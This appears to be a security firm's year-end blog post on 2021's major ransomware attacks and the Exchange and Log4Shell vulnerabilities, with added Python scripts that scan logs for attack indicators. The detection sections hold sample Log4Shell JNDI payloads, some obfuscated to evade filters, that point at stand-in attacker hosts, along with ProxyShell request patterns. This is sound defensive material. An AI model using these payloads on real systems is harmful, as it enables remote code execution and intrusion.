This year is on its way out, but before we say goodbye, let's take stock of the major 2021 cybersecurity events. As we'll see, the biggest attacks used ransomware, the attackers demanded millions of dollars in exchange for decryption tools, and the victims usually paid. And while two out of three Americans say they are "very concerned" about hackers, by October 2021 had already seen more data breaches than all of 2020, putting it on pace to set a single-year record.
While we could point to many different cyber attacks from 2021, here are five that stand out:
Insurance giant CNA Financial Corp. suffered a major ransomware attack in March. It reportedly paid the attackers a handsome sum of $40 million, after the group had spent about two weeks inside the network stealing data before encrypting it. Reports indicate that the group used a ransomware strain called Phoenix Locker, which has roots in a Russian cybercrime syndicate.
Government officials were not happy with the major payout. They argued that negotiating and paying off these hackers only encourages the behavior. CNA contends that it complied with all relevant laws in the wake of the attacks.
In May the cybercrime group DarkSide hit the fuel pipeline operator Colonial Pipeline with ransomware. Initial access came from a single compromised password for a legacy VPN account that did not require multi-factor authentication. Colonial shut down pipeline operations as a precaution, disrupting fuel supplies across the eastern United States.
Colonial paid about $4.4 million (75 bitcoin) in ransom to DarkSide, which had also stolen data from the company and was threatening to leak it as additional leverage.
As with the CNA attack, the FBI discouraged the payout. In June the U.S. Department of Justice seized part of the ransom wallet and recovered about $2.3 million worth of bitcoin.
DarkSide struck again in May, this time attacking the German chemical distributor Brenntag with ransomware. The group claimed to have stolen 150 GB of data and threatened to leak it publicly; the data reportedly included Social Security numbers, dates of birth, and driver's license numbers. Brenntag paid DarkSide $4.4 million for a decryption tool to recover its encrypted data and reported no evidence that the stolen data had been used fraudulently.
Then in early June the meatpacking giant JBS USA halted its North American and Australian operations after a ransomware attack. Cattle slaughtering stopped at its plants, raising fears of food supply chain disruption and higher meat prices. The FBI attributed the attack to the group known as REvil, or Sodinokibi.
To end the disruption, JBS paid $11 million to the crime syndicate and returned to full operations within days. There is no report that any of that payment was recovered by the government.
Just a few weeks later, on July 2, REvil struck again. This time the target was U.S.-based Kaseya, with the attack "holding more than 1,000 companies ransom." The group exploited zero-day vulnerabilities in Kaseya's VSA (Virtual System Administrator) remote-management product, which managed service providers run as an on-premises server, and used it to push a malicious "update" that deployed ransomware to thousands of the endpoints those MSPs managed.
REvil publicly demanded $70 million for a universal decryptor (reportedly lowering the figure to $50 million), but Kaseya refused to pay. On July 22 the company said it had obtained a "100% effective" decryption tool from a third party without paying (the key was later reported to have come from the FBI), and it used the tool to help affected customers recover their encrypted data.
Businesses of all sizes need to be aware of where they may be vulnerable to bad actors. Here are three examples from 2021 to illustrate:
The Microsoft Exchange Server attacks in the early months of 2021 (attributed by Microsoft to the China-based group Hafnium and exploiting the ProxyLogon chain of vulnerabilities, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065) raised concerns for any business running on-premises Exchange for email; Exchange Online was not affected. The attacks were widespread, with an estimated 30,000 U.S. organizations compromised, including many small businesses. In each instance the attackers left behind web shells, password-protected scripts on the server that gave them continued remote access even after the original vulnerabilities were patched.
Microsoft encouraged administrators to do more than patch: patching closes the vulnerabilities but does not remove a web shell that is already in place, so organizations needed to investigate for prior compromise (Microsoft published indicators and scanning scripts for this) and implement detections to catch future attempts.
From August 2021 Exchange servers were attacked again, this time through the ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207). Microsoft had fixed these in its April and May 2021 security updates, months before mass exploitation began, so the servers hit were those that had not yet been patched.
The fix, then, is known; the work is keeping up with it. Best practices include keeping servers on a supported Cumulative Update (CU) and applying the latest Security Update promptly, installing the latest CU when building a new server, and backing up any customizations (for example, changes to web.config files) before upgrading, since installing a CU is an in-place run of Exchange Setup that can overwrite them.
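As an added example of the kind of detection Microsoft's guidance asks for (this is not code from the original post or from Microsoft), the following Python script triages an Exchange server's IIS W3C access log for two published indicators: the ProxyShell pattern of requests to `/autodiscover/autodiscover.json` whose query smuggles an `@` followed by a backend path such as `/powershell` or `/mapi/nspi`, and requests for `.aspx` files under `/aspnet_client/`, a directory where Hafnium web shells were dropped and which normally serves no ASP.NET pages. The log excerpt, its field order, and all addresses are constructed for the example; real logs carry more fields, but the parser reads the `#Fields:` header so the order does not matter.

```python
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (not real data): three hostile requests and one benign one.
IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-08-21 03:12:45 POST /autodiscover/autodiscover.json @evil.test/powershell/?X-Rps-CAT=AAAA 203.0.113.8 200
2021-08-21 03:13:02 GET /autodiscover/autodiscover.json @evil.test/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.test 203.0.113.8 200
2021-08-21 03:15:10 POST /aspnet_client/supp0rt.aspx - 203.0.113.8 200
2021-08-21 03:16:00 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.example.test%2fowa%2f 192.0.2.44 200
"""

# Backend paths seen in the published ProxyShell exploit chain.
PROXYSHELL_TARGETS = ("/powershell", "/mapi/nspi", "/ews/")


def parse_iis_w3c(text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields: header."""
    fields, rows = [], []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
        elif raw and not raw.startswith("#"):
            # W3C logs separate fields with spaces and never contain literal spaces in values.
            rows.append(dict(zip(fields, raw.split())))
    return rows


def classify(row):
    """Return the name of the matching indicator, or None for an unremarkable request."""
    stem = unquote(row.get("cs-uri-stem", "")).lower()
    query = unquote(row.get("cs-uri-query", "")).lower()
    # ProxyShell: autodiscover.json with an "@" path-confusion trick that reaches a backend.
    if (stem.endswith("/autodiscover/autodiscover.json")
            and "@" in query
            and any(target in query for target in PROXYSHELL_TARGETS)):
        return "proxyshell-autodiscover"
    # Web shell candidate: ASP.NET pages served from a directory that should only hold static files.
    if stem.startswith("/aspnet_client/") and stem.endswith(".aspx"):
        return "webshell-candidate"
    return None


def triage_iis_log(text):
    """Return (indicator, client IP, URI stem) for every request that matches an indicator."""
    hits = []
    for row in parse_iis_w3c(text):
        rule = classify(row)
        if rule:
            hits.append((rule, row["c-ip"], row["cs-uri-stem"]))
    return hits


if __name__ == "__main__":
    for rule, client, stem in triage_iis_log(IIS_LOG):
        print(f"{rule:24} {client:15} {stem}")
```

A hit is a lead, not proof: the autodiscover rule is specific enough to act on immediately, while the `aspnet_client` rule should be confirmed by listing the directory on the server and comparing file timestamps against the request times in the log.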
Log4j is a widely used Java logging library, embedded in countless consumer and enterprise applications. The Apache Log4j vulnerability disclosed in December 2021, CVE-2021-44228 and known as Log4Shell (some early reporting also called it "LogJam," a name that properly belongs to an unrelated 2015 TLS weakness), "allows threat actors to execute code remotely on a targeted computer." The mechanism is Log4j's lookup feature: if an attacker can get a string such as `${jndi:ldap://attacker-host/x}` into any value the application logs (a User-Agent header, a username, a chat message), the library resolves it by fetching an object from the attacker's server. Log4j 2 versions 2.0-beta9 through 2.14.1 are affected; Apache's fix arrived in 2.15.0, with follow-up releases (2.16.0, 2.17.0 and 2.17.1) closing related issues, so the target is the latest 2.x release.
There are ways to protect against this vulnerability. Top tips include inventorying where Log4j is present (including inside vendor products) so that patching can be prioritized, applying software updates the minute they're available, removing the JndiLookup class from the classpath where upgrading is delayed, as Apache advised for older versions, and installing a web application firewall "with rules that automatically update so that your SOC is able to concentrate on fewer alerts." A WAF is a stopgap rather than a fix: attackers quickly found obfuscations, such as nested lookups of the form `${${lower:j}ndi:...}`, that slipped past early signatures.
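To make the detection side of this concrete, here is an added example (not code from the original post or from Apache) that scans web-server access log lines for the lookup strings Log4Shell exploits. It first undoes URL encoding and the common nested-lookup obfuscations (`${lower:x}`, `${upper:x}`, `${env:NOPE:-x}`, `${::-x}`, `${date:'x'}`) until the string stops changing, and only then looks for `${jndi:`, which is why the obfuscated lines below are caught. The log lines, addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic). Three carry Log4Shell lookups in the
# User-Agent field: plain, nested-lookup obfuscated, and default-value obfuscated plus
# URL encoding. The last line is ordinary traffic.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:rmi://198.51.100.7:1099/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:40 +0000] "GET /login HTTP/1.1" 200 "-" "${${lower:j}ndi:${upper:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.2 - - [10/Dec/2021:14:04:02 +0000] "GET /api HTTP/1.1" 200 "-" "%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%24%7B%3A%3A-%3A%7Dldap%3A//198.51.100.7%3A1389/a%7D"',
    '10.0.0.3 - - [10/Dec/2021:14:05:55 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# Innermost lookups that evaluate to a literal; each is replaced by that literal.
LOOKUP_RULES = [
    # ${lower:x} and ${upper:x} -> x (everything is case-folded at the end anyway)
    re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I),
    # ${env:NOPE:-x}, ${sys:NOPE:-x}, ${::-x} -> x (the default-value trick)
    re.compile(r"\$\{[^${}]*:-([^${}]*)\}"),
    # ${date:'x'} -> x (a quoted literal inside a date pattern)
    re.compile(r"\$\{date:'([^'${}]*)'\}", re.I),
]

# After normalization, the lookup that triggers the vulnerability: ${jndi:<protocol>:...
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):")


def normalize(s):
    """Decode URL encoding (twice, for double encoding) and collapse nested lookups until stable."""
    s = unquote(unquote(s))
    prev = None
    while prev != s:
        prev = s
        for rule in LOOKUP_RULES:
            s = rule.sub(lambda m: m.group(1), s)
    return s.lower()


def find_jndi_lookups(lines):
    """Return (1-based line number, JNDI protocol) for each line containing a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = JNDI_RE.search(normalize(line))
        if match:
            hits.append((number, match.group(1)))
    return hits


if __name__ == "__main__":
    for number, protocol in find_jndi_lookups(SAMPLE_LINES):
        print(f"line {number}: jndi lookup via {protocol}")
```

Normalization before matching is the point: a signature for the literal text `${jndi:` misses the second and third lines entirely. The rule list covers the obfuscations that were widely seen in December 2021, not every lookup Log4j supports, so a scanner like this belongs alongside patching rather than in place of it.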
While 2021 is soon to be in the past, it would be wishful thinking to expect 2022 not to bring more of the same. Experts predict that ransomware costs will exceed $265 billion a year by 2031 and that a ransomware attack will occur every 2 seconds. While big companies made the headlines, many small and medium-sized businesses dealt with attacks as well, ranging from business email compromise, to wire fraud, to ransomware. Smaller companies hold the information cybercriminals want, and they often lack the security infrastructure to defend it. According to reports, 43% of cyber attacks target small businesses.
Vigilance, education, and protection are therefore paramount for businesses of all sizes. If you want to have peace of mind as you face 2022, lean on Blue Team Alpha to provide that for you. Contact us today to learn more about our cybersecurity services.